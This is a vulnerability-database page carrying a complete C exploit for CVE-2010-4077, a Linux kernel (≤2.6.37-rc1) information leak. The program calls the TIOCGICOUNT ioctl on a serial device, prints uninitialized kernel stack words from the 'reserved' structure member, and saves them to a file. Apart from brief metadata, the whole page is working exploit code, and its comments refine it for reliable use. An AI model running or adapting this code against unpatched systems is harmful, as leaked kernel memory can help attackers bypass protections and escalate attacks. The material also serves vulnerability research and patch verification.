seebugRootSSV:71461
HistoryJul 01, 2014 - 12:00 a.m.

Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit

2014-07-01 00:00:00
Root
www.seebug.org
19

0.0004 Low

EPSS

Percentile

12.7%

No description provided by source.


/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
 * ================================================
 * Information leak exploit for CVE-2010-4077 which
 * leaks kernel stack space back to userland due to
 * uninitialized struct member "reserved" in struct
 * serial_icounter_struct copied to userland. uses
 * ioctl to trigger memory leak, dumps to file and
 * displays to command line.
 *
 * -- prdelka
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <unistd.h>

#include <linux/serial.h>

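/*
 * Queries TIOCGICOUNT on a serial device and reports the contents of the
 * "reserved" member of struct serial_icounter_struct (CVE-2010-4077, per
 * the file header).
 *
 * argv[1] is the device to open, e.g. /dev/ttyS0. The local structure is
 * zeroed before the ioctl, so any non-zero word seen in "reserved"
 * afterwards was copied out by the kernel. The words are printed and also
 * written to ./leak.
 *
 * NOTE(review): on a kernel that initialises the whole structure before
 * copying it out, every word is expected to read back as zero -- confirm
 * against the kernel under test.
 *
 * Exits with 0 on success and -1 on any failure.
 */
int main(int argc, char* argv[]) {
    int fd;
    size_t i;
    ssize_t written;
    struct serial_icounter_struct buffer;
    /*
     * Take the element count from the header instead of hard-coding it:
     * linux/serial.h declares "int reserved[9]", so a fixed "i <= 9" loop
     * reads one int past the end of the structure and reports a word of
     * this process's own stack as if the kernel had returned it.
     */
    const size_t nwords = sizeof(buffer.reserved) / sizeof(buffer.reserved[0]);

    printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
    if (argc < 2) {
        printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
        exit(-1);
    }

    /* Zero first so that whatever shows up later is attributable to the ioctl. */
    memset(&buffer, 0, sizeof(buffer));

    if ((fd = open(argv[1], O_RDONLY)) == -1) {
        printf("[ Couldn't open %s\n", argv[1]);
        exit(-1);
    }
    if (ioctl(fd, TIOCGICOUNT, &buffer) == -1) {
        printf("[ Problem with ioctl() request\n");
        close(fd);
        exit(-1);
    }
    close(fd);

    for (i = 0; i < nwords; i++) {
        /* %x expects unsigned int; the member is declared int. */
        printf("[ int leak[%d]: %x\n", (int)i, (unsigned int)buffer.reserved[i]);
    }

    /* O_TRUNC so that a longer file left by an earlier run cannot leave stale bytes. */
    if ((fd = open("./leak", O_RDWR | O_CREAT | O_TRUNC, 0640)) == -1) {
        printf("[ Can't open file to write memory out\n");
        exit(-1);
    }

    /*
     * One write of the whole array. A failed write returns -1, which must
     * be reported rather than summed into the byte count.
     */
    written = write(fd, buffer.reserved, sizeof(buffer.reserved));
    if (written == -1) {
        printf("[ Problem writing to ./leak\n");
        close(fd);
        exit(-1);
    }
    close(fd);

    printf("[ Written %d leaked bytes to ./leak\n", (int)written);
    exit(0);
}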